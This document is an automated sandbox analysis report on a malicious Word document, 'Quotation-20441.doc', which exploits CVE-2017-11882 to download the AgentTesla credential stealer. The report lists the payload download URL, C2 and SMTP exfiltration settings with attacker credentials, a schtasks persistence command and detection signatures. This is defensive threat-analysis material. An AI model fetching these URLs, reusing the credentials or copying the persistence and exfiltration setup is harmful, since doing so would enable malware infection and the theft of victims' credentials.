Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Quotation-20441.doc

Overview

General Information

Sample Name:Quotation-20441.doc
Analysis ID:348466
MD5:a4a16a26c3c523df880322d2d67f94e9
SHA1:d6a0db01a060a2d6f450695df09f58c532679992
SHA256:cdd4f66fe598fb83c5499682a71f8b2de731adf92586da00920ff6aa41bc7fe6
Tags:doc

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2280 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • missijng.exe (PID: 2932 cmdline: C:\Users\user\AppData\Roaming\missijng.exe MD5: 75E7F84FC3FB447922B02A1289A4D827)
      • schtasks.exe (PID: 2896 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • missijng.exe (PID: 3024 cmdline: C:\Users\user\AppData\Roaming\missijng.exe MD5: 75E7F84FC3FB447922B02A1289A4D827)
  • EQNEDT32.EXE (PID: 2996 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "gpLOsNsHheeHC1u", "URL: ": "http://HlWPVIg1XOk4EZ.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "eBUUMnV", "From: ": "mrst@mrst-kr.icu"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2148667814.0000000003239000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.missijng.exe.3525c80.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.missijng.exe.224067c.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                7.2.missijng.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.missijng.exe.3525c80.6.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.missijng.exe.34201d0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\missijng.exe, CommandLine: C:\Users\user\AppData\Roaming\missijng.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\missijng.exe, NewProcessName: C:\Users\user\AppData\Roaming\missijng.exe, OriginalFileName: C:\Users\user\AppData\Roaming\missijng.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: C:\Users\user\AppData\Roaming\missijng.exe, ProcessId: 2932
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exe
                      Sigma detected: Scheduled temp file as task from temp locationShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\missijng.exe, ParentImage: C:\Users\user\AppData\Roaming\missijng.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp', ProcessId: 2896

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exeAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: missijng.exe.3024.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "gpLOsNsHheeHC1u", "URL: ": "http://HlWPVIg1XOk4EZ.org", "To: ": "mrst@mrst-kr.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "eBUUMnV", "From: ": "mrst@mrst-kr.icu"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: globalteamacademy.comVirustotal: Detection: 7%Perma Link
                      Source: http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exeVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Roaming\ROGxuzog.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Roaming\missijng.exeReversingLabs: Detection: 26%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Quotation-20441.docVirustotal: Detection: 47%Perma Link
                      Source: Quotation-20441.docReversingLabs: Detection: 48%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\ROGxuzog.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\missijng.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\missijng.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_002FCBB8
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_002FCBC0
                      Source: global trafficDNS query: name: globalteamacademy.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 43.252.37.193:80

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://HlWPVIg1XOk4EZ.org
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Feb 2021 08:18:53 GMTServer: ApacheLast-Modified: Wed, 03 Feb 2021 23:07:52 GMTAccept-Ranges: bytesContent-Length: 1076224Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 36 2b 1b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 50 0c 00 00 1a 04 00 00 00 00 00 0a 6e 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 6d 0c 00 4f 00 00 00 00 80 0c 00 18 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 4e 0c 00 00 20 00 00 00 50 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 16 04 00 00 80 0c 00 00 18 04 00 00 52 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 6a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 6d 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 87 01 00 10 6a 01 00 03 00 00 00 01 00 00 06 00 f2 02 00 b8 7b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 10 03 00 06 28 34 00 00 0a 00 2a 26 00 02 28 35 00 00 0a 00 2a ce 73 36 00 00 0a 80 01 00 00 04 73 37 00 00 0a 80 02 00 00 04 73 38 00 00 0a 80 03 00 00 04 73 39 00 00 0a 80 04 00 00 04 73 3a 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6
                      Source: Joe Sandbox ViewIP Address: 43.252.37.193 43.252.37.193
                      Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                      Source: Joe Sandbox ViewASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                      Source: global trafficHTTP traffic detected: GET /docct/pal/g1OsYVWymzBgTTt.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B68C113C-9B88-4A7A-BAAD-75353DCC52EC}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /docct/pal/g1OsYVWymzBgTTt.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: globalteamacademy.com
                      Source: missijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: missijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: missijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpString found in binary or memory: http://Gspsks.com
                      Source: missijng.exe, 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, missijng.exe, 00000007.00000002.2405333180.0000000002630000.00000004.00000001.sdmp, missijng.exe, 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmpString found in binary or memory: http://HlWPVIg1XOk4EZ.org
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: missijng.exe, 00000007.00000002.2409650555.00000000085A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: missijng.exe, 00000007.00000002.2409650555.00000000085A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COM8
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: missijng.exe, 00000007.00000002.2404653860.00000000007E7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: missijng.exe, 00000007.00000002.2404653860.00000000007E7000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: missijng.exe, 00000007.00000003.2236426608.0000000006F4E000.00000004.00000001.sdmp, missijng.exe, 00000007.00000002.2404635440.00000000007CD000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: missijng.exe, 00000007.00000003.2236426608.0000000006F4E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enjj
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                      Source: missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                      Source: missijng.exe, 00000007.00000002.2409650555.00000000085A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: missijng.exe, 00000004.00000002.2151786703.0000000005250000.00000002.00000001.sdmp, missijng.exe, 00000007.00000002.2409005501.0000000005D10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: missijng.exe, 00000007.00000002.2409452001.00000000082A0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: missijng.exe, missijng.exe, 00000007.00000000.2146913218.0000000000D22000.00000020.00020000.sdmp, ROGxuzog.exe.4.drString found in binary or memory: http://tempuri.org/databaseSystemDataSet.xsd
                      Source: missijng.exe, 00000004.00000002.2151786703.0000000005250000.00000002.00000001.sdmp, missijng.exe, 00000007.00000002.2409005501.0000000005D10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                      Source: missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                      Source: missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: missijng.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: missijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.2.missijng.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE6ADD9C3u002d899Au002d4BECu002dBDE6u002d6DA676D3EF08u007d/u0037A14B8E8u002dCE6Cu002d4FA1u002dB56Cu002dC13370123E47.csLarge array initialization: .cctor: array initializer size 11931
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\missijng.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_00D277E74_2_00D277E7
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_002F1CE04_2_002F1CE0
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_002F17874_2_002F1787
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_002F601C4_2_002F601C
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_002F37874_2_002F3787
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_002F37984_2_002F3798
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_00D277E77_2_00D277E7
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_004022967_2_00402296
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_001E53387_2_001E5338
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_001E63507_2_001E6350
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_001E56807_2_001E5680
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_001E20917_2_001E2091
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_00967CA87_2_00967CA8
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_0096B03B7_2_0096B03B
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_0096DBB87_2_0096DBB8
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_009661E87_2_009661E8
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_00960B087_2_00960B08
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_009628247_2_00962824
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_0096B6207_2_0096B620
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_009621807_2_00962180
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_009647007_2_00964700
                      Source: g1OsYVWymzBgTTt[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ROGxuzog.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
